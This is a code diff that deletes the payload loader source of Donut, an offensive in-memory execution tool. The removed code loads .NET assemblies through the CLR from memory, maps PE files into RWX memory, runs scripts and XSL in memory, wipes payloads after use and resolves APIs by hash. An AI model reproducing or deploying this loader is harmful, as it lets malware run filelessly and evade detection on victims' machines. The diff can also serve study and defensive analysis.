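-inst->api.SysFreeString(domain);
-
-if(SUCCEEDED(hr)) {
-DPRINT("IUnknown::QueryInterface");
-
-hr = pa->iu->lpVtbl->QueryInterface(
-pa->iu, (REFIID)&inst->xIID_AppDomain, (LPVOID)&pa->ad);
-
-if(SUCCEEDED(hr)) {
-sab.lLbound = 0;
-sab.cElements = mod->len;
-sa = inst->api.SafeArrayCreate(VT_UI1, 1, &sab);
-
-if(sa != NULL) {
-DPRINT("Copying %" PRIi64 " bytes of assembly to safe array", mod->len);
-
-for(i=0, p=sa->pvData; i<mod->len; i++) {
-p[i] = mod->data[i];
-}
-
-DPRINT("AppDomain::Load_3");
-
-hr = pa->ad->lpVtbl->Load_3(
-pa->ad, sa, &pa->as);
-
-loaded = hr == S_OK;
-
-DPRINT("HRESULT : %08lx", hr);
-
-DPRINT("Erasing assembly from memory");
-
-for(i=0, p=sa->pvData; i<mod->len; i++) {
-p[i] = mod->data[i] = 0;
-}
-
-DPRINT("SafeArrayDestroy");
-inst->api.SafeArrayDestroy(sa);
-}
-}
-}
-}
-return loaded;
-}
-
-BOOL RunAssembly(PDONUT_INSTANCE inst, PDONUT_ASSEMBLY pa) {
-SAFEARRAY *sav=NULL, *params=NULL;
-VARIANT arg, ret, vtPsa, v1={0}, v2;
-DWORD i;
-PDONUT_MODULE mod;
-HRESULT hr;
-BSTR cls, method;
-ULONG cnt;
-OLECHAR str[1]={0};
-LONG ucnt, lcnt;
-
-if(inst->type == DONUT_INSTANCE_PIC) {
-DPRINT("Using module embedded in instance");
-mod = (PDONUT_MODULE)&inst->module.x;
-} else {
-DPRINT("Loading module from allocated memory");
-mod = inst->module.p;
-}
-
-DPRINT("Type is %s",
-mod->type == DONUT_MODULE_NET_DLL ? "DLL" : "EXE");
-
-// if this is a program
-if(mod->type == DONUT_MODULE_NET_EXE) {
-// get the entrypoint
-DPRINT("MethodInfo::EntryPoint");
-hr = pa->as->lpVtbl->EntryPoint(pa->as, &pa->mi);
-
-if(SUCCEEDED(hr)) {
-// get the parameters for entrypoint
-DPRINT("MethodInfo::GetParameters");
-hr = pa->mi->lpVtbl->GetParameters(pa->mi, &params);
-
-if(SUCCEEDED(hr)) {
-DPRINT("SafeArrayGetLBound");
-hr = inst->api.SafeArrayGetLBound(params, 1, &lcnt);
-
-DPRINT("SafeArrayGetUBound");
-hr = inst->api.SafeArrayGetUBound(params, 1, &ucnt);
-cnt = ucnt - lcnt + 1;
-DPRINT("Number of parameters for entrypoint : %i", cnt);
-
-// does Main require string[] args?
-if(cnt != 0) {
-// create a 1 dimensional array for Main parameters
-sav = inst->api.SafeArrayCreateVector(VT_VARIANT, 0, 1);
-// if user specified their own parameters, add to string array
-if(mod->param_cnt != 0) {
-// create 1 dimensional array for strings[] args
-vtPsa.vt = (VT_ARRAY | VT_BSTR);
-vtPsa.parray = inst->api.SafeArrayCreateVector(VT_BSTR, 0, mod->param_cnt);
-
-// add each string parameter
-for(i=0; i<mod->param_cnt; i++) {
-DPRINT("Adding \"%ws\" as parameter %i", mod->param[i], (i + 1));
-
-inst->api.SafeArrayPutElement(vtPsa.parray,
-&i, inst->api.SysAllocString(mod->param[i]));
-}
-} else {
-DPRINT("Adding empty string for invoke_3");
-// add empty string to make it work
-// create 1 dimensional array for strings[] args
-vtPsa.vt = (VT_ARRAY | VT_BSTR);
-vtPsa.parray = inst->api.SafeArrayCreateVector(VT_BSTR, 0, 1);
-
-i=0;
-inst->api.SafeArrayPutElement(vtPsa.parray,
-&i, inst->api.SysAllocString(str));
-}
-// add string array to list of parameters
-i=0;
-inst->api.SafeArrayPutElement(sav, &i, &vtPsa);
-}
-v1.vt = VT_NULL;
-v1.plVal = NULL;
-
-DPRINT("MethodInfo::Invoke_3()\n");
-
-hr = pa->mi->lpVtbl->Invoke_3(pa->mi, v1, sav, &v2);
-
-DPRINT("MethodInfo::Invoke_3 : %08lx : %s",
-hr, SUCCEEDED(hr) ? "Success" : "Failed");
-
-if(sav != NULL) {
-inst->api.SafeArrayDestroy(vtPsa.parray);
-inst->api.SafeArrayDestroy(sav);
-}
-}
-} else pa->mi = NULL;
-} else {
-DPRINT("SysAllocString(\"%ws\")", mod->cls);
-cls = inst->api.SysAllocString(mod->cls);
-if(cls == NULL) return FALSE;
-
-DPRINT("SysAllocString(\"%ws\")", mod->method);
-method = inst->api.SysAllocString(mod->method);
-
-if(method != NULL) {
-DPRINT("Assembly::GetType_2");
-hr = pa->as->lpVtbl->GetType_2(pa->as, cls, &pa->type);
-
-if(SUCCEEDED(hr)) {
-sav = NULL;
-if(mod->param_cnt != 0) {
-DPRINT("SafeArrayCreateVector(%li parameter(s))", mod->param_cnt);
-
-sav = inst->api.SafeArrayCreateVector(
-VT_VARIANT, 0, mod->param_cnt);
-
-if(sav != NULL) {
-for(i=0; i<mod->param_cnt; i++) {
-DPRINT("Adding \"%ws\" as parameter %i", mod->param[i], (i+1));
-
-V_BSTR(&arg) = inst->api.SysAllocString(mod->param[i]);
-V_VT(&arg) = VT_BSTR;
-
-hr = inst->api.SafeArrayPutElement(sav, &i, &arg);
-
-if(FAILED(hr)) {
-DPRINT("SafeArrayPutElement failed.");
-inst->api.SafeArrayDestroy(sav);
-sav = NULL;
-}
-}
-}
-}
-if(SUCCEEDED(hr)) {
-DPRINT("Calling Type::InvokeMember_3");
-
-hr = pa->type->lpVtbl->InvokeMember_3(
-pa->type,
-method, // name of method
-BindingFlags_InvokeMethod |
-BindingFlags_Static |
-BindingFlags_Public,
-NULL,
-v1, // empty VARIANT
-sav, // arguments to method
-&ret); // return code from method
-
-DPRINT("Type::InvokeMember_3 : %08lx : %s",
-hr, SUCCEEDED(hr) ? "Success" : "Failed");
-
-if(sav != NULL) {
-inst->api.SafeArrayDestroy(sav);
-}
-}
-}
-inst->api.SysFreeString(method);
-}
-inst->api.SysFreeString(cls);
-}
-return TRUE;
-}
-
-VOID FreeAssembly(PDONUT_INSTANCE inst, PDONUT_ASSEMBLY pa) {
-
-if(pa->type != NULL) {
-DPRINT("Type::Release");
-pa->type->lpVtbl->Release(pa->type);
-pa->type = NULL;
-}
-
-if(pa->mi != NULL) {
-DPRINT("MethodInfo::Release");
-pa->mi->lpVtbl->Release(pa->mi);
-pa->mi = NULL;
-}
-
-if(pa->as != NULL) {
-DPRINT("Assembly::Release");
-pa->as->lpVtbl->Release(pa->as);
-pa->as = NULL;
-}
-
-if(pa->ad != NULL) {
-DPRINT("AppDomain::Release");
-pa->ad->lpVtbl->Release(pa->ad);
-pa->ad = NULL;
-}
-
-if(pa->iu != NULL) {
-DPRINT("IUnknown::Release");
-pa->iu->lpVtbl->Release(pa->iu);
-pa->iu = NULL;
-}
-
-if(pa->icrh != NULL) {
-DPRINT("ICorRuntimeHost::Stop");
-pa->icrh->lpVtbl->Stop(pa->icrh);
-
-DPRINT("ICorRuntimeHost::Release");
-pa->icrh->lpVtbl->Release(pa->icrh);
-pa->icrh = NULL;
-}
-
-if(pa->icri != NULL) {
-DPRINT("ICLRRuntimeInfo::Release");
-pa->icri->lpVtbl->Release(pa->icri);
-pa->icri = NULL;
-}
-
-if(pa->icmh != NULL) {
-DPRINT("ICLRMetaHost::Release");
-pa->icmh->lpVtbl->Release(pa->icmh);
-pa->icmh = NULL;
-}
-}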
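--- a/payload/inmem_pe.c
+++ b/payload/inmem_pe.c
@@ -1,249 +0,0 @@
-/**
-BSD 3-Clause License
-
-Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
-
-Redistribution and use in source and binary forms, with or without
-modification, are permitted provided that the following conditions are met:
-
-* Redistributions of source code must retain the above copyright notice, this
-list of conditions and the following disclaimer.
-
-* Redistributions in binary form must reproduce the above copyright notice,
-this list of conditions and the following disclaimer in the documentation
-and/or other materials provided with the distribution.
-
-* Neither the name of the copyright holder nor the names of its
-contributors may be used to endorse or promote products derived from
-this software without specific prior written permission.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
-AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
-IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
-FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
-DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
-OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-*/
-
-#ifdef _WIN64
-#define IMAGE_REL_TYPE IMAGE_REL_BASED_DIR64
-#else
-#define IMAGE_REL_TYPE IMAGE_REL_BASED_HIGHLOW
-#endif
-
-typedef struct _IMAGE_RELOC {
-WORD offset :12;
-WORD type :4;
-} IMAGE_RELOC, *PIMAGE_RELOC;
-
-typedef BOOL (WINAPI *DllMain_t)(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved);
-typedef VOID (WINAPI *Start_t)(VOID);
-
-typedef void (__cdecl *call_stub_t)(FARPROC api, int param_cnt, WCHAR param[DONUT_MAX_PARAM][DONUT_MAX_NAME]);
-
-// same as strcmp
-int xstrcmp(char *s1, char *s2) {
-while(*s1 && (*s1==*s2))s1++,s2++;
-return (int)*(unsigned char*)s1 - *(unsigned char*)s2;
-}
-
-// In-Memory execution of unmanaged DLL file. YMMV with EXE files requiring subsystem..
-VOID RunPE(PDONUT_INSTANCE inst) {
-PIMAGE_DOS_HEADER dos, doshost;
-PIMAGE_NT_HEADERS nt, nthost;
-PIMAGE_SECTION_HEADER sh;
-PIMAGE_THUNK_DATA oft, ft;
-PIMAGE_IMPORT_BY_NAME ibn;
-PIMAGE_IMPORT_DESCRIPTOR imp;
-PIMAGE_EXPORT_DIRECTORY exp;
-PIMAGE_RELOC list;
-PIMAGE_BASE_RELOCATION ibr;
-DWORD rva;
-PDWORD adr;
-PDWORD sym;
-PWORD ord;
-PBYTE ofs;
-PCHAR str, name;
-HMODULE dll;
-ULONG_PTR ptr;
-DllMain_t DllMain; // DLL
-Start_t Start; // EXE
-call_stub_t CallApi; // DLL function
-LPVOID cs = NULL, base, host;
-DWORD i, cnt;
-PDONUT_MODULE mod;
-FARPROC api=NULL; // DLL export
-
-// write shellcode to stack. msvc sux!!
-#include "call_api_bin.h"
-
-if(inst->type == DONUT_INSTANCE_PIC) {
-DPRINT("Using module embedded in instance");
-mod = (PDONUT_MODULE)&inst->module.x;
-} else {
-DPRINT("Loading module from allocated memory");
-mod = inst->module.p;
-}
-
-base = mod->data;
-dos = (PIMAGE_DOS_HEADER)base;
-nt = RVA2VA(PIMAGE_NT_HEADERS, base, dos->e_lfanew);
-
-// before doing anything. check compatibility between exe/dll and host process.
-host = inst->api.GetModuleHandle(NULL);
-doshost = (PIMAGE_DOS_HEADER)host;
-nthost = RVA2VA(PIMAGE_NT_HEADERS, host, doshost->e_lfanew);
-
-if(nt->FileHeader.Machine != nthost->FileHeader.Machine) {
-DPRINT("Host process and payload are not compatiable...cannot load.");
-return;
-}
-
-DPRINT("Allocating %" PRIi32 " (0x%" PRIx32 ") bytes of RWX memory for file",
-nt->OptionalHeader.SizeOfImage, nt->OptionalHeader.SizeOfImage);
-
-cs = inst->api.VirtualAlloc(
-NULL, nt->OptionalHeader.SizeOfImage + 4096,
-MEM_COMMIT | MEM_RESERVE,
-PAGE_EXECUTE_READWRITE);
-
-if(cs == NULL) return;
-
-DPRINT("Copying each section to RWX memory %p", cs);
-sh = IMAGE_FIRST_SECTION(nt);
-
-for(i=0; i<nt->FileHeader.NumberOfSections; i++) {
-Memcpy((PBYTE)cs + sh[i].VirtualAddress,
-(PBYTE)base + sh[i].PointerToRawData,
-sh[i].SizeOfRawData);
-}
-
-DPRINT("Processing the Import Table");
-rva = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress;
-imp = RVA2VA(PIMAGE_IMPORT_DESCRIPTOR, cs, rva);
-
-// For each DLL
-for (;imp->Name!=0; imp++) {
-name = RVA2VA(PCHAR, cs, imp->Name);
-
-DPRINT("Loading %s", name);
-dll = inst->api.LoadLibraryA(name);
-
-// Resolve the API for this library
-oft = RVA2VA(PIMAGE_THUNK_DATA, cs, imp->OriginalFirstThunk);
-ft = RVA2VA(PIMAGE_THUNK_DATA, cs, imp->FirstThunk);
-
-// For each API
-for (;; oft++, ft++) {
-// No API left?
-if (oft->u1.AddressOfData == 0) break;
-
-PULONG_PTR func = (PULONG_PTR)&ft->u1.Function;
-
-// Resolve by ordinal?
-if (IMAGE_SNAP_BY_ORDINAL(oft->u1.Ordinal)) {
-*func = (ULONG_PTR)inst->api.GetProcAddress(dll, (LPCSTR)IMAGE_ORDINAL(oft->u1.Ordinal));
-} else {
-// Resolve by name
-ibn = RVA2VA(PIMAGE_IMPORT_BY_NAME, cs, oft->u1.AddressOfData);
-*func = (ULONG_PTR)inst->api.GetProcAddress(dll, ibn->Name);
-}
-}
-}
-
-DPRINT("Applying Relocations");
-rva = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress;
-ibr = RVA2VA(PIMAGE_BASE_RELOCATION, cs, rva);
-ofs = (PBYTE)cs - nt->OptionalHeader.ImageBase;
-
-while(ibr->VirtualAddress != 0) {
-list = (PIMAGE_RELOC)(ibr + 1);
-
-while ((PBYTE)list != (PBYTE)ibr + ibr->SizeOfBlock) {
-if(list->type == IMAGE_REL_TYPE) {
-*(ULONG_PTR*)((PBYTE)cs + ibr->VirtualAddress + list->offset) += (ULONG_PTR)ofs;
-} else if(list->type != IMAGE_REL_BASED_ABSOLUTE) {
-DPRINT("ERROR: Unrecognized Relocation type %08lx.", (DWORD)list->type);
-goto pe_cleanup;
-}
-list++;
-}
-ibr = (PIMAGE_BASE_RELOCATION)list;
-}
-
-if(mod->type == DONUT_MODULE_DLL) {
-// call exported api?
-if(mod->method[0] != 0) {
-DPRINT("Resolving address of %s", (char*)mod->method);
-
-rva = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
-
-if(rva != 0) {
-exp = RVA2VA(PIMAGE_EXPORT_DIRECTORY, cs, rva);
-cnt = exp->NumberOfNames;
-
-DPRINT("IMAGE_EXPORT_DIRECTORY.NumberOfNames : %i", cnt);
-
-if(cnt != 0) {
-adr = RVA2VA(PDWORD,cs, exp->AddressOfFunctions);
-sym = RVA2VA(PDWORD,cs, exp->AddressOfNames);
-ord = RVA2VA(PWORD, cs, exp->AddressOfNameOrdinals);
-
-do {
-str = RVA2VA(PCHAR, cs, sym[cnt-1]);
-if(!xstrcmp(str, (char*)mod->method)) {
-api = RVA2VA(FARPROC, cs, adr[ord[cnt-1]]);
-break;
-}
-} while (--cnt);
-
-if(api != NULL) {
-CallApi = inst->api.VirtualAlloc(
-NULL,
-sizeof(CALL_API_BIN),
-MEM_COMMIT | MEM_RESERVE,
-PAGE_EXECUTE_READWRITE);
-
-if(CallApi != NULL) {
-DPRINT("Calling %s via code stub.", (char*)mod->method);
-Memcpy((void*)CallApi, (void*)CALL_API_BIN, sizeof(CALL_API_BIN));
-CallApi(api, mod->param_cnt, mod->param);
-DPRINT("Erasing code stub");
-Memset(CallApi, 0, sizeof(CALL_API_BIN));
-inst->api.VirtualFree(CallApi, 0, MEM_DECOMMIT | MEM_RELEASE);
-}
-} else {
-DPRINT("Unable to resolve API");
-goto pe_cleanup;
-}
-}
-}
-} else {
-DPRINT("Executing entrypoint of DLL\n\n");
-DllMain = RVA2VA(DllMain_t, cs, nt->OptionalHeader.AddressOfEntryPoint);
-DllMain(host, DLL_PROCESS_ATTACH, NULL);
-}
-} else {
-// The problem with executing EXE files:
-// 1) They use subsystems either GUI or CUI
-// 2) They call ExitProcess ...will need to review support of this later.
-DPRINT("Executing entrypoint of EXE\n\n");
-Start = RVA2VA(Start_t, cs, nt->OptionalHeader.AddressOfEntryPoint);
-Start();
-}
-pe_cleanup:
-// if memory allocated
-if(cs != NULL) {
-// DPRINT("Erasing %" PRIi32 " bytes of memory at %p",
-// nt->OptionalHeader.SizeOfImage, cs);
-// erase from memory (disabled for now)
-// Memset(cs, 0, nt->OptionalHeader.SizeOfImage);
-// release
-DPRINT("Releasing memory");
-inst->api.VirtualFree(cs, 0, MEM_DECOMMIT | MEM_RELEASE);
-}
-}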
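--- a/payload/inmem_script.c
+++ b/payload/inmem_script.c
@@ -1,156 +0,0 @@
-/**
-BSD 3-Clause License
-
-Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
-
-Redistribution and use in source and binary forms, with or without
-modification, are permitted provided that the following conditions are met:
-
-* Redistributions of source code must retain the above copyright notice, this
-list of conditions and the following disclaimer.
-
-* Redistributions in binary form must reproduce the above copyright notice,
-this list of conditions and the following disclaimer in the documentation
-and/or other materials provided with the distribution.
-
-* Neither the name of the copyright holder nor the names of its
-contributors may be used to endorse or promote products derived from
-this software without specific prior written permission.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
-AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
-IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
-FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
-DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
-OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-*/
-
-VOID RunScript(PDONUT_INSTANCE inst) {
-HRESULT hr;
-IActiveScriptParse *parser;
-IActiveScript *engine;
-MyIActiveScriptSite mas;
-IActiveScriptSiteVtbl activescript_vtbl;
-IHostVtbl wscript_vtbl;
-PDONUT_MODULE mod;
-PWCHAR script;
-ULONG64 len;
-BSTR obj;
-BOOL disabled;
-
-if(inst->type == DONUT_INSTANCE_PIC) {
-DPRINT("Using module embedded in instance");
-mod = (PDONUT_MODULE)&inst->module.x;
-} else {
-DPRINT("Loading module from allocated memory");
-mod = inst->module.p;
-}
-
-// 1. Allocate memory for unicode format of script
-script = (PWCHAR)inst->api.VirtualAlloc(
-NULL,
-(inst->mod_len + 1) * sizeof(WCHAR),
-MEM_COMMIT | MEM_RESERVE,
-PAGE_READWRITE);
-
-// 2. Convert string to unicode.
-if(script != NULL) {
-// 2. Convert string to unicode.
-inst->api.MultiByteToWideChar(CP_ACP, 0, mod->data,
--1, script, mod->len * sizeof(WCHAR));
-
-// we're using stack memory for the virtual function table
-mas.site.lpVtbl = (IActiveScriptSiteVtbl*)&activescript_vtbl;
-ActiveScript_New(inst, &mas.site);
-
-mas.wscript.lpVtbl = (IHostVtbl*)&wscript_vtbl;
-Host_New(inst, &mas.wscript);
-
-mas.siteWnd.lpVtbl = NULL;
-
-// 4. Initialize COM, MyIActiveScriptSite and event for OnLeaveScript method
-DPRINT("CoInitializeEx");
-hr = inst->api.CoInitializeEx(NULL, COINIT_MULTITHREADED);
-
-if(hr == S_OK) {
-// 5. Instantiate the active script engine
-DPRINT("CoCreateInstance(IID_IActiveScript)");
-
-hr = inst->api.CoCreateInstance(
-&inst->xCLSID_ScriptLanguage, 0,
-CLSCTX_INPROC_SERVER | CLSCTX_INPROC_HANDLER,
-&inst->xIID_IActiveScript, (void **)&engine);
-
-if(hr == S_OK) {
-// 6. Get IActiveScriptParse object from engine
-DPRINT("IActiveScript::QueryInterface(IActiveScriptParse)");
-
-hr = engine->lpVtbl->QueryInterface(
-engine,
-#ifdef _WIN64
-&inst->xIID_IActiveScriptParse64,
-#else
-&inst->xIID_IActiveScriptParse32,
-#endif
-(void **)&parser);
-
-if(hr == S_OK) {
-// 7. Initialize parser
-DPRINT("IActiveScriptParse::InitNew");
-hr = parser->lpVtbl->InitNew(parser);
-
-if(hr == S_OK) {
-// 8. Set custom script interface
-DPRINT("IActiveScript::SetScriptSite");
-mas.wscript.lpEngine = engine;
-
-hr = engine->lpVtbl->SetScriptSite(
-engine, (IActiveScriptSite *)&mas);
-
-if(hr == S_OK) {
-DPRINT("IActiveScript::AddNamedItem(\"%ws\")", inst->wscript);
-obj = inst->api.SysAllocString(inst->wscript);
-hr = engine->lpVtbl->AddNamedItem(engine, (LPCOLESTR)obj, SCRIPTITEM_ISVISIBLE);
-inst->api.SysFreeString(obj);
-
-if(hr == S_OK) {
-// 9. Load script
-DPRINT("IActiveScriptParse::ParseScriptText");
-hr = parser->lpVtbl->ParseScriptText(
-parser, (LPCOLESTR)script, NULL, NULL, NULL, 0, 0, 0, NULL, NULL);
-
-if(hr == S_OK) {
-// 10. Run script
-DPRINT("IActiveScript::SetScriptState(SCRIPTSTATE_CONNECTED)");
-hr = engine->lpVtbl->SetScriptState(
-engine, SCRIPTSTATE_CONNECTED);
-
-// SetScriptState blocks here
-}
-}
-}
-}
-DPRINT("IActiveScriptParse::Release");
-parser->lpVtbl->Release(parser);
-}
-DPRINT("IActiveScript::Close");
-engine->lpVtbl->Close(engine);
-
-DPRINT("IActiveScript::Release");
-engine->lpVtbl->Release(engine);
-}
-}
-DPRINT("Erasing script from memory");
-Memset(script, 0, (inst->mod_len + 1) * sizeof(WCHAR));
-
-DPRINT("VirtualFree(script)");
-inst->api.VirtualFree(script, 0, MEM_RELEASE | MEM_DECOMMIT);
-}
-}
-
-#include "activescript.c"
-#include "wscript.c"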
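--- a/payload/inmem_xsl.c
+++ b/payload/inmem_xsl.c
@@ -1,109 +0,0 @@
-/**
-BSD 3-Clause License
-
-Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
-
-Redistribution and use in source and binary forms, with or without
-modification, are permitted provided that the following conditions are met:
-
-* Redistributions of source code must retain the above copyright notice, this
-list of conditions and the following disclaimer.
-
-* Redistributions in binary form must reproduce the above copyright notice,
-this list of conditions and the following disclaimer in the documentation
-and/or other materials provided with the distribution.
-
-* Neither the name of the copyright holder nor the names of its
-contributors may be used to endorse or promote products derived from
-this software without specific prior written permission.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
-AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
-IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
-FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
-DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
-OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-*/
-
-VOID RunXSL(PDONUT_INSTANCE inst) {
-IXMLDOMDocument *pDoc;
-IXMLDOMNode *pNode;
-HRESULT hr;
-PWCHAR xsl_str;
-VARIANT_BOOL loaded;
-BSTR res;
-PDONUT_MODULE mod;
-ULONG64 len;
-UCHAR c;
-
-if(inst->type == DONUT_INSTANCE_PIC) {
-DPRINT("Using module embedded in instance");
-mod = (PDONUT_MODULE)&inst->module.x;
-} else {
-DPRINT("Loading module from allocated memory");
-mod = inst->module.p;
-}
-
-// 1. Allocate RW memory for unicode format of script
-xsl_str = (PWCHAR)inst->api.VirtualAlloc(
-NULL,
-(inst->mod_len + 1) * sizeof(WCHAR),
-MEM_COMMIT | MEM_RESERVE,
-PAGE_READWRITE);
-
-if(xsl_str != NULL) {
-// 2. Convert string to unicode.
-inst->api.MultiByteToWideChar(CP_ACP, 0, mod->data,
--1, xsl_str, mod->len * sizeof(WCHAR));
-
-// 3. Initialize COM
-DPRINT("CoInitializeEx");
-hr = inst->api.CoInitializeEx(NULL, COINIT_MULTITHREADED);
-
-if(hr == S_OK) {
-// 4. Instantiate XMLDOMDocument object
-DPRINT("CoCreateInstance");
-hr = inst->api.CoCreateInstance(
-&inst->xCLSID_DOMDocument30,
-NULL, CLSCTX_INPROC_SERVER,
-&inst->xIID_IXMLDOMDocument,
-(void**)&pDoc);
-
-if(hr == S_OK) {
-// 5. load XSL file
-DPRINT("IXMLDOMDocument::loadXML");
-hr = pDoc->lpVtbl->loadXML(pDoc, (BSTR)xsl_str, &loaded);
-DPRINT("HRESULT: %08lx loaded : %s",
-hr, loaded ? "TRUE" : "FALSE");
-
-if(hr == S_OK && loaded) {
-// 6. query node interface
-DPRINT("IXMLDOMDocument::QueryInterface");
-hr = pDoc->lpVtbl->QueryInterface(
-pDoc, &inst->xIID_IXMLDOMNode, (void **)&pNode);
-
-if(hr == S_OK) {
-DPRINT("HRESULT: %08lx", hr);
-// 7. execute script
-DPRINT("IXMLDOMDocument::transformNode");
-hr = pDoc->lpVtbl->transformNode(pDoc, pNode, &res);
-DPRINT("HRESULT: %08lx", hr);
-pNode->lpVtbl->Release(pNode);
-}
-}
-pDoc->lpVtbl->Release(pDoc);
-}
-DPRINT("CoUninitialize");
-inst->api.CoUninitialize();
-}
-DPRINT("Erasing XSL from memory.");
-Memset(xsl_str, 0, (inst->mod_len + 1) * sizeof(WCHAR));
-
-DPRINT("VirtualFree()");
-inst->api.VirtualFree(xsl_str, 0, MEM_RELEASE | MEM_DECOMMIT);
-}
-}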
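--- a/payload/order.txt
+++ b/payload/order.txt
@@ -1 +0,0 @@
-ThreadProc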
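--- a/payload/payload.c
+++ b/payload/payload.c
@@ -1,267 +0,0 @@
-/**
-BSD 3-Clause License
-
-Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
-
-Redistribution and use in source and binary forms, with or without
-modification, are permitted provided that the following conditions are met:
-
-* Redistributions of source code must retain the above copyright notice, this
-list of conditions and the following disclaimer.
-
-* Redistributions in binary form must reproduce the above copyright notice,
-this list of conditions and the following disclaimer in the documentation
-and/or other materials provided with the distribution.
-
-* Neither the name of the copyright holder nor the names of its
-contributors may be used to endorse or promote products derived from
-this software without specific prior written permission.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
-AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
-IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
-FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
-DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
-OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-*/
-
-#include "payload.h"
-
-DWORD ThreadProc(LPVOID lpParameter) {
-ULONG i, ofs;
-ULONG64 sig;
-PDONUT_INSTANCE inst = (PDONUT_INSTANCE)lpParameter;
-DONUT_ASSEMBLY assembly;
-PDONUT_MODULE mod;
-VirtualAlloc_t _VirtualAlloc;
-VirtualFree_t _VirtualFree;
-LPVOID pv;
-ULONG64 hash;
-BOOL disabled;
-
-DPRINT("Maru IV : %" PRIX64, inst->iv);
-
-hash = inst->api.hash[ (offsetof(DONUT_INSTANCE, api.VirtualAlloc) - offsetof(DONUT_INSTANCE, api)) / sizeof(ULONG_PTR)];
-DPRINT("Resolving address for VirtualAlloc() : %" PRIX64, hash);
-_VirtualAlloc = (VirtualAlloc_t)xGetProcAddress(inst, hash, inst->iv);
-
-hash = inst->api.hash[ (offsetof(DONUT_INSTANCE, api.VirtualFree) - offsetof(DONUT_INSTANCE, api)) / sizeof(ULONG_PTR)];
-DPRINT("Resolving address for VirtualAlloc() : %" PRIX64, hash);
-_VirtualFree = (VirtualFree_t) xGetProcAddress(inst, hash, inst->iv);
-
-if(_VirtualAlloc == NULL || _VirtualFree == NULL) {
-DPRINT("FAILED!.");
-return -1;
-}
-
-DPRINT("VirtualAlloc : %p VirtualFree : %p",
-(LPVOID)_VirtualAlloc, (LPVOID)_VirtualFree);
-
-DPRINT("Allocating %i bytes of RW memory", inst->len);
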